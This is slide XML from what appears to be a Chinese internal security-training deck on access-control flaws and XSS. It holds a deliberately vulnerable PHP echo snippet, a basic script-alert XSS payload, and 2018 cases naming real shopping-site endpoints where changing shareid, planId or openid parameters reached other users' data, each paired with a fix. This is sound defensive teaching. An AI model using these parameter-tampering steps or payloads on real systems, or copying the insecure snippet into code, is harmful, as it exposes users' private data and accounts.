              <a:gd name="connsiteX4-31" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4-32" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX5-33" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY5-34" fmla="*/ 0 h 1154343"/>
              <a:gd name="connsiteX6-35" fmla="*/ 917172 w 1152000"/>
              <a:gd name="connsiteY6-36" fmla="*/ 91441 h 1154343"/>
              <a:gd name="connsiteX0-37" fmla="*/ 825732 w 1152000"/>
              <a:gd name="connsiteY0-38" fmla="*/ 1 h 1154343"/>
              <a:gd name="connsiteX1-39" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY1-40" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX2-41" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2-42" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX3-43" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY3-44" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX4-45" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4-46" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX5-47" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY5-48" fmla="*/ 0 h 1154343"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0-37" y="connsiteY0-38"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1-39" y="connsiteY1-40"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2-41" y="connsiteY2-42"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3-43" y="connsiteY3-44"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX4-45" y="connsiteY4-46"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX5-47" y="connsiteY5-48"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1152000" h="1154343">
                <a:moveTo>
                  <a:pt x="825732" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1152000" y="2343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1152000" y="1154343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1154343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323289" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="19050"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10250"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67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cs"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
          </a:p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53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cs"/>
              </a:rPr>
              <a:t>part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504190" y="216123"/>
            <a:ext cx="691007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越权访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>举个例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628015" y="890644"/>
            <a:ext cx="8315960" cy="537377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有这么一个链接，修改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pin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参数，可以查看自己在京东的浏览记录</a:t>
            </a:r>
          </a:p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然而，继续修改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pin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，可以查看别人的浏览记录，这个例子的问题：可以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查看任意账户浏览</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="12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记录</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200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en-US" altLang="zh-CN"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85" y="1513629"/>
            <a:ext cx="8063865" cy="40881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6525" y="4337050"/>
            <a:ext cx="2491740" cy="2052955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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6" y="1801661"/>
            <a:ext cx="8063864" cy="4390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09190" y="1931035"/>
            <a:ext cx="680085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对角圆角矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602615" y="1233805"/>
            <a:ext cx="9625330" cy="4837430"/>
          </a:xfrm>
          <a:prstGeom prst="round2Diag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漏洞原理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用户A通常只能够对自己的信息进行增删改查，但是由于程序员疏忽未对信息进行增删改查的时判断，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所需要操作的信息是否属于对应用户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，导致A可以越权操作其他人的信息。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越权缺陷产生的原因是由于用户名或者ID是Web程序用来判断对哪个账户的数据进行操作，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这个参数如果通过客户端来提交并且Web应用未对该参数做校验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的情况下，通过修改请求据中的相应字段则实现越权数据操作。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业务影响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1) 越权查询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越权查询比较明显的，是会导致用户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隐私信息的泄漏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（例如：越权查询引起诈骗）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2) 越权修改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越权修改会导致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个人信息被篡改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（例如：越权修改你的收获地址等信息）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3) 越权增删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越权删除会导致恶意攻击者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增删你的部分数据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（例如：删除 /添加你的用户订单）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40" y="1467485"/>
            <a:ext cx="1047750" cy="8064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64690" y="1717040"/>
            <a:ext cx="19881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漏洞简介</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504190" y="503555"/>
            <a:ext cx="691007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越权访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>简介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C3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC33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C3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例子</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC33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09190" y="1931035"/>
            <a:ext cx="680085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对角圆角矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="594360" y="1377315"/>
            <a:ext cx="3806825" cy="4253230"/>
          </a:xfrm>
          <a:prstGeom prst="round2Diag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假设页面把用户输入的参数直接输出到页面上：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&lt;?php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$input = $_GET["param"];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echo "&lt;div&gt;".$input."&lt;/div&gt;";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?&gt;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58385" y="1305560"/>
            <a:ext cx="5753735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但是如果提交一段HTML代码：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http://127.0.0.1/test.php?param=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC33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&lt;script&gt;alert("xss")&lt;/script&gt;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Chrome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浏览器中：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="14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730" y="2747010"/>
            <a:ext cx="6038215" cy="2790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10" y="1689100"/>
            <a:ext cx="1826260" cy="12160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75790" y="1946275"/>
            <a:ext cx="19881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XSS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例子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wn Arrow Callout 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504825" y="1337945"/>
            <a:ext cx="2508885" cy="2003425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9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Down Arrow Callout 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3510280" y="1224280"/>
            <a:ext cx="3145155" cy="2143760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9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Down Arrow Callout 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7043420" y="756285"/>
            <a:ext cx="3601720" cy="2442210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9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1" name="Straight Connector 43"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504190" y="3528060"/>
            <a:ext cx="1051306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8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1759374" y="3317474"/>
            <a:ext cx="0" cy="227330"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050" cap="rnd">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="65000"/>
                <a:lumOff val="3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8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8842375" y="3199130"/>
            <a:ext cx="3810" cy="328930"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050" cap="rnd">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="65000"/>
                <a:lumOff val="3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8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5082807" y="3366841"/>
            <a:ext cx="1" cy="177642"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050" cap="rnd">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="65000"/>
                <a:lumOff val="3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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504190" y="503555"/>
            <a:ext cx="691007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越权访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>——2018</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年部门案例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04825" y="1387475"/>
            <a:ext cx="25736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购物圈</a:t>
            </a:r>
            <a:r>
              <a:rPr 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修改</a:t>
            </a:r>
            <a:r>
              <a:rPr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shareid</a:t>
            </a:r>
            <a:r>
              <a:rPr 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参数</a:t>
            </a:r>
            <a:r>
              <a:rPr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可删除不属于自己的feed</a:t>
            </a:r>
            <a:endParaRPr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wq.jd.com/shopgroup_feed_action/delete_feed</a:t>
            </a:r>
            <a:r>
              <a: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shareid=xxx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr sz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修复方案：</a:t>
            </a:r>
          </a:p>
          <a:p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无法通过更改shareid参数值，来删除别人的信息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509645" y="1069975"/>
            <a:ext cx="314642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微店管理后台存在未授权访问及越权 </a:t>
            </a:r>
            <a:endParaRPr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POST /martweb/brand/saveSubject.jsonp?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planId=</a:t>
            </a:r>
            <a:r>
              <a:rPr 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xxx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修复方案</a:t>
            </a:r>
            <a:r>
              <a:rPr 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无法通过更改planid参数值，来修改其他用户的信息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118350" y="772795"/>
            <a:ext cx="35267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越权导致盗号绑定 </a:t>
            </a:r>
            <a:endParaRPr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https://wq.jd.com/pinbind/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BindSqUserWithPin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openid=xxx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&amp;accessToken=1&amp;_=1518004520962&amp;g_tk=2110689674&amp;g_ty=ajax&amp;callback=JQuery17342728347+</a:t>
            </a:r>
          </a:p>
          <a:p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漏洞说明</a:t>
            </a:r>
            <a:r>
              <a:rPr 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修改openid为自己QQ的openid即可</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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完成绑定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修复方案</a:t>
            </a:r>
            <a:r>
              <a:rPr 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增加用户一致性判断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940560" y="3920490"/>
            <a:ext cx="258445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微信购物圈子管理后台 未授权访问 </a:t>
            </a:r>
            <a:endParaRPr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http://wqs.jd.com/circle/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admin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/data.html</a:t>
            </a:r>
          </a:p>
          <a:p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漏洞说明</a:t>
            </a:r>
            <a:r>
              <a:rPr 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直接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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访问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可以看到管理界面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 </a:t>
            </a:r>
          </a:p>
          <a:p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修复方案</a:t>
            </a:r>
            <a:r>
              <a:rPr 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无权限禁止访问</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Down Arrow Callout 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1963420" y="3755390"/>
            <a:ext cx="2529205" cy="2319655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9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5" name="Straight Connector 38"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3228129" y="3528294"/>
            <a:ext cx="0" cy="227330"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050" cap="rnd">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="65000"/>
                <a:lumOff val="3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585460" y="3920490"/>
            <a:ext cx="400431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“京东优选”修改密码后仍可查看订单、收获地址等信息 </a:t>
            </a:r>
            <a:endParaRPr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微信绑定方式登陆JD-》JD 官网或者 JD APP</a:t>
            </a:r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修改登录密码</a:t>
            </a:r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-》访问 微信-&gt;我-&gt;钱包-&gt;“京东优选”</a:t>
            </a:r>
          </a:p>
          <a:p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漏洞说明</a:t>
            </a:r>
            <a:r>
              <a:rPr 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不需要输入修改后的登陆密码，依然可以访问购物车（含最新添加的数据）、全部收获地址（不含姓名、手机号），全部订单信息。</a:t>
            </a:r>
          </a:p>
          <a:p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修复方案</a:t>
            </a:r>
            <a:r>
              <a:rPr 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修改密码后，用户进入需要登录态的页面，跳转到账号验证页    </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Down Arrow Callout 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5585460" y="3738880"/>
            <a:ext cx="4004310" cy="2673350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9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8" name="Straight Connector 38"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7587404" y="3511784"/>
            <a:ext cx="0" cy="227330"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050" cap="rnd">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="65000"/>
                <a:lumOff val="3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animBg="1"/>
      <p:bldP spid="20" grpId="0"/>
      <p:bldP spid="21" grpId="0"/>
      <p:bldP spid="22" grpId="0"/>
      <p:bldP spid="23" grpId="0"/>
      <p:bldP spid="24" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="26" grpId="0"/>
      <p:bldP spid="27" grpId="0" bldLvl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532" y="-5785"/>
            <a:ext cx="11518986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90"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1306911" y="1443999"/>
            <a:ext cx="1475998" cy="7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425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47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2321678" y="1584460"/>
            <a:ext cx="4091714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86393" tIns="43197" rIns="86393" bIns="4319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13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做最好的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="13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3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，给最好的你。更多作品请在稻壳儿搜索：没有肉的鸡腿。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1325" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="表格 3"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="549275" y="1802130"/>
          <a:ext cx="1023366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300"/>
                <a:gridCol w="987425"/>
                <a:gridCol w="4238625"/>
                <a:gridCol w="2113915"/>
                <a:gridCol w="1012190"/>
                <a:gridCol w="1005205"/>
              </a:tblGrid>
              <a:tr h="3962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漏洞类型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正确结果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是否达标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备注</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc rowSpan="4"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越权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登录态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缺少关键登录态字段（wid、skey、openid、venderid等）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跳转去登录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3810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不同账号登录（内网erp，普通用户、卖家等）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拦截无权限的账号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3962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不同登录环境（PC、微信、APP等）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拦截错误环境的登录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　</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="3962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请求接口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修改类似 xx_id 等字段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无法返回或者修改非此登录态的信息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9" name="文本占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504190" y="503555"/>
            <a:ext cx="691007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越权访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>测试方法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49275" y="4306570"/>
            <a:ext cx="5001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2018年安全案例分析&amp;安全测试checklist</a:t>
            </a:r>
          </a:p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https://cf.jd.com/pages/viewpage.action?pageId=109441501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6" grpId="0"/>
      <p:bldP spid="2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>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6882" y="2367064"/>
            <a:ext cx="11520311" cy="1323036"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9144000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX1" fmla="*/ 7058024 w 9144000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX2" fmla="*/ 7058024 w 9144000"/>
              <a:gd name="connsiteY2" fmla="*/ 973931 h 1076325"/>
              <a:gd name="connsiteX3" fmla="*/ 8354024 w 9144000"/>
              <a:gd name="connsiteY3" fmla="*/ 973931 h 1076325"/>
              <a:gd name="connsiteX4" fmla="*/ 8354024 w 9144000"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX5" fmla="*/ 9144000 w 9144000"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX6" fmla="*/ 9144000 w 9144000"/>
              <a:gd name="connsiteY6" fmla="*/ 1076325 h 1076325"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 9144000"/>
              <a:gd name="connsiteY7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076325">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7058024" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7058024" y="973931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8354024" y="973931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8354024" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="1076325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1076325"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FA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025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882" y="2577070"/>
            <a:ext cx="8886240" cy="898525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535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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>信息泄露</a:t>
            </a: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8989125" y="2056556"/>
            <a:ext cx="1452039" cy="1419038"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1152000"/>
              <a:gd name="connsiteX1" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1152000"/>
              <a:gd name="connsiteX2" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2" fmla="*/ 1152000 h 1152000"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY3" fmla="*/ 1152000 h 1152000"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1152000"/>
              <a:gd name="connsiteX0-1" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY0-2" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX1-3" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY1-4" fmla="*/ 0 h 1154343"/>
              <a:gd name="connsiteX2-5" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2-6" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX3-7" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY3-8" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX4-9" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4-10" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY5" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX0-11" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY0-12" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX1-13" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY1-14" fmla="*/ 0 h 1154343"/>
              <a:gd name="connsiteX2-15" fmla="*/ 825732 w 1152000"/>
              <a:gd name="connsiteY2-16" fmla="*/ 1 h 1154343"/>
              <a:gd name="connsiteX3-17" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY3-18" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX4-19" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY4-20" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX5-21" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY5-22" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY6" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX0-23" fmla="*/ 825732 w 1152000"/>
              <a:gd name="connsiteY0-24" fmla="*/ 1 h 1154343"/>
              <a:gd name="connsiteX1-25" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY1-26" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX2-27" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2-28" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX3-29" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY3-30" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX4-31" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4-32" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX5-33" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY5-34" fmla="*/ 0 h 1154343"/>
              <a:gd name="connsiteX6-35" fmla="*/ 917172 w 1152000"/>
              <a:gd name="connsiteY6-36" fmla="*/ 91441 h 1154343"/>
              <a:gd name="connsiteX0-37" fmla="*/ 825732 w 1152000"/>
              <a:gd name="connsiteY0-38" fmla="*/ 1 h 1154343"/>
              <a:gd name="connsiteX1-39" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY1-40" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX2-41" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2-42" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX3-43" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY3-44" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX4-45" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4-46" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX5-47" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY5-48" fmla="*/ 0 h 1154343"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0-37" y="connsiteY0-38"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1-39" y="connsiteY1-40"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2-41" y="connsiteY2-42"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3-43" y="connsiteY3-44"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX4-45" y="connsiteY4-46"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX5-47" y="connsiteY5-48"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1152000" h="1154343">
                <a:moveTo>
                  <a:pt x="825732" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1152000" y="2343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1152000" y="1154343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1154343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323289" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="19050"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10250"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67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cs"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
          </a:p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53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cs"/>
              </a:rPr>
              <a:t>part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532" y="-5785"/>
            <a:ext cx="11518986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90"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1306911" y="1443999"/>
            <a:ext cx="1475998" cy="7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425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47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2321678" y="1584460"/>
            <a:ext cx="4091714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86393" tIns="43197" rIns="86393" bIns="4319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13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做最好的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="13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3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，给最好的你。更多作品请在稻壳儿搜索：没有肉的鸡腿。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1325" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="表格 3"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="549275" y="3450590"/>
          <a:ext cx="10536555" cy="169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/>
                <a:gridCol w="1041400"/>
                <a:gridCol w="5118100"/>
                <a:gridCol w="3107055"/>
              </a:tblGrid>
              <a:tr h="4572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漏洞类型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正确结果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POC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样例</a:t>
